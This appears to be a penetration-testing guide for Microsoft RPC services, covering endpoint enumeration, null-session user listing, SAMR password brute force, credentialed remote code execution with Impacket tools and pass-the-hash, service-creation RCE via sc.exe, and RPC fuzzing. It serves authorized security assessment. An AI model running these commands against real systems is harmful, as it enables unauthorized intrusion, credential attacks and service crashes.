MSRPC Pentesting Skill

A comprehensive guide for testing Microsoft Remote Procedure Call (MSRPC) services during security assessments.

Quick Start

# Basic RPC enumeration
rpcdump.py <target-ip> -p 135

# Metasploit RPC scanner
use auxiliary/scanner/dcerpc/endpoint_mapper
set RHOSTS <target-ip>
run

# Execute with valid credentials
python3 dcomexec.py <domain>/<user>:<password>@<target-ip>

Port Overview

1. Enumerate RPC Services

Using rpcdump

# Basic enumeration
rpcdump.py <target-ip> -p 135

# With specific port
rpcdump.py <target-ip> -p <port>

Output format:

IFID: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:<IP>[1028]

Using Metasploit

msfconsole

# Endpoint mapper scanner
use auxiliary/scanner/dcerpc/endpoint_mapper
set RHOSTS <target-ip>
run

# Hidden services scanner
use auxiliary/scanner/dcerpc/hidden
set RHOSTS <target-ip>
run

# Management interface scanner
use auxiliary/scanner/dcerpc/management
set RHOSTS <target-ip>
run

# TCP DCERPC auditor
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
set RHOSTS <target-ip>
run

Using Impacket rpcmap

# Enumerate with string binding
rpcmap.py <target-ip> -p 135

# With authentication
rpcmap.py <target-ip> -u <user> -p <password>

2. Critical RPC Interfaces

These IFIDs represent high-value targets for enumeration and exploitation:

\pipe\lsarpc

\pipe\lsarpc

\pipe\samr

\pipe\atsvc

\pipe\winreg

\pipe\svcctl

\pipe\srvsvc

\pipe\epmapper

SAMR Interface - Password Brute Force

The SAMR interface can brute-force passwords regardless of account lockout policy:

# Using rpcclient
rpcclient -U "<user>%<password>" <target-ip>

# Enumerate users
enumdomusers

# Query user info
querydomuser <username>

Task Scheduler - Remote Command Execution

# Via atsvc pipe
python3 atsvc.py <target-ip> <command>

3. Remote Code Execution with Credentials

Using dcomexec.py

# Basic execution
python3 dcomexec.py <domain>/<user>:<password>@<target-ip>

# With specific object
python3 dcomexec.py <domain>/<user>:<password>@<target-ip> -object ShellWindows
python3 dcomexec.py <domain>/<user>:<password>@<target-ip> -object ShellBrowserWindow
python3 dcomexec.py <domain>/<user>:<password>@<target-ip> -object MMC20

# With hash
python3 dcomexec.py <domain>/<user>:<hash>@<target-ip>

# With Kerberos
python3 dcomexec.py <domain>/<user>@<target-ip> -k

Try all three objects - different systems may have different DCOM configurations.

Using wmiexec.py

python3 wmiexec.py <domain>/<user>:<password>@<target-ip>

Using smbexec.py

python3 smbexec.py <domain>/<user>:<password>@<target-ip>

4. Port 593 (HTTP RPC)

# Using rpcdump.exe
rpcdump.exe <target-ip> -p 593

# Using curl for basic testing
curl -v http://<target-ip>:593/

5. IP Address Enumeration via IOXIDResolver

Abuse the ServerAlive2 method to enumerate network interfaces:

# Using IOXIDResolver
git clone https://github.com/mubix/IOXIDResolver
cd IOXIDResolver
python3 IOXIDResolver.py <target-ip>

# Alternative with rpcmap.py
rpcmap.py <target-ip> -p 135 --stringbinding

This can reveal IPv6 addresses and network interface information without authentication.

6. Advanced: RPC Fuzzing

Using MS-RPC-Fuzzer

Warning: This is destructive testing. Always use isolated VM snapshots.

# Import the module
Import-Module .\MS-RPC-Fuzzer.psm1

# Inventory interfaces from a binary
Get-RpcServerData -Target "C:\Windows\System32\efssvc.dll" -OutPath .\output

# Or crawl entire System32
Get-RpcServerData -OutPath .\output

# Run the fuzzer
'.\output\rpcServerData.json' |
    Invoke-RpcFuzzer -OutPath .\output `
                     -MinStrLen 100  -MaxStrLen 1000 `
                     -MinIntSize 9999 -MaxIntSize 99999

# With sorted execution (respects parameter dependencies)
'.\output\rpcServerData.json' |
    Invoke-RpcFuzzer -OutPath .\output -Sorted

Output files:

• allowed.json

  - Successful calls

• denied.json

  - Access denied responses

• error.json

  - Errors and crashes

• log.txt

  - Full execution log (last line shows crash trigger)

Using NtObjectManager

# Install module
Install-Module NtObjectManager -Force

# Parse RPC interfaces
$rpcinterfaces = Get-RpcServer "C:\Windows\System32\efssvc.dll"
$rpcinterfaces | Format-Table Name,Uuid,Version,Procedures

# Inspect a procedure
$rpcinterfaces[0].Procedures[0] | Format-List *

# Generate C# client stub
Format-RpcClient $rpcinterfaces[0] -Namespace MS_EFSR -OutputPath .\MS_EFSR.cs

# Create interactive client
$client = Get-RpcClient $rpcinterfaces[0]
Connect-RpcClient $client -stringbinding 'ncacn_np:127.0.0.1[\\pipe\\efsrpc]' `
                     -AuthenticationLevel PacketPrivacy `
                     -AuthenticationType WinNT

# Invoke procedure
$ctx = New-Object Marshal.NdrContextHandle
$client.EfsRpcOpenFileRaw([ref]$ctx, "\\127.0.0.1\test", 0)

Context-Aware Fuzzing

Invoke-MSRPCFuzzer -Pipe "\\.\pipe\efsrpc" -Auth NTLM `
                   -MinLen 1  -MaxLen 0x400 `
                   -Iterations 100000 `
                   -OutDir .\results

7. Visualize with Neo4j

# Import fuzzing results to Neo4j
'.\output\allowed.json' |
    Import-DataToNeo4j -Neo4jHost 192.168.56.10:7474 -Neo4jUsername neo4j

Graph structure:

• Nodes: RPC servers, interfaces, procedures
• Relationships: ALLOWED, DENIED, ERROR interactions

Example Cypher query:

MATCH (p:Procedure)-[r:ERROR]->(c:Crash)
RETURN p.name, p.opnum, c.payload

8. Binding Types

ncacn_ip_tcp

ncadg_ip_udp

ncacn_np

ncacn_http

9. Authentication Levels

# Available authentication levels
- None
- Connect
- Call
- Packet
- PacketIntegrity
- PacketPrivacy

# Available authentication types
- Null
- WinNT
- Kerberos

10. Common Attack Patterns

Pattern 1: Null Session Enumeration

# Check for null session access
rpcclient -U ""%"" <target-ip>

# If successful, enumerate
enumdomusers
enumdomgroups

Pattern 2: Service Control RCE

# Via svcctl pipe
python3 svcctl.py <target-ip> <command>

# Or use sc.exe from Windows
sc \\ <target-ip> create <service> binPath= "<command>"
sc \\ <target-ip> start <service>

Pattern 3: Registry Manipulation

# Via winreg pipe
python3 winreg.py <target-ip> <key> <value>

11. Safety Guidelines

⚠️ Critical Warnings:

1. Always test in isolated environments - RPC fuzzing can cause BSODs
2. Use VM snapshots - Restore after destructive testing
3. Get authorization - Only test systems you own or have permission to test
4. Monitor system stability - Many RPC services run as SYSTEM
5. Document findings - Track which procedures cause crashes for PoC development

12. Troubleshooting

Connection refused on port 135

# Check if firewall is blocking
nmap -p 135 <target-ip>

# Try alternative ports
rpcdump.py <target-ip> -p 593

Authentication failures

# Try different auth methods
python3 dcomexec.py <user>:<password>@<target-ip> -k  # Kerberos
python3 dcomexec.py <user>:<hash>@<target-ip>         # NTLM hash
python3 dcomexec.py <user>:<password>@<target-ip> -no-pass  # No password

Service crashes during fuzzing

# Check log.txt for last successful call
tail -n 10 log.txt

# Review error.json for crash details
cat error.json | jq '.[] | select(.status == "crash")'

13. References

• MS-RPC-Fuzzer
• NtObjectManager
• IOXIDResolver
• Impacket
• 0x00sec MSRPC Handbook
• Airbus IOXID Research

14. Quick Reference Card

# Enumeration
rpcdump.py <ip> -p 135
rpcmap.py <ip> -p 135

# RCE with credentials
dcomexec.py <user>:<pass>@<ip>
wmiexec.py <user>:<pass>@<ip>
smbexec.py <user>:<pass>@<ip>

# Metasploit
use auxiliary/scanner/dcerpc/endpoint_mapper
set RHOSTS <ip>
run

# Fuzzing (Windows only)
Get-RpcServerData -OutPath .\output
Invoke-RpcFuzzer -OutPath .\output

Remember: RPC vulnerabilities often lead to remote code execution or local privilege escalation. Always prioritize finding and documenting these issues during assessments.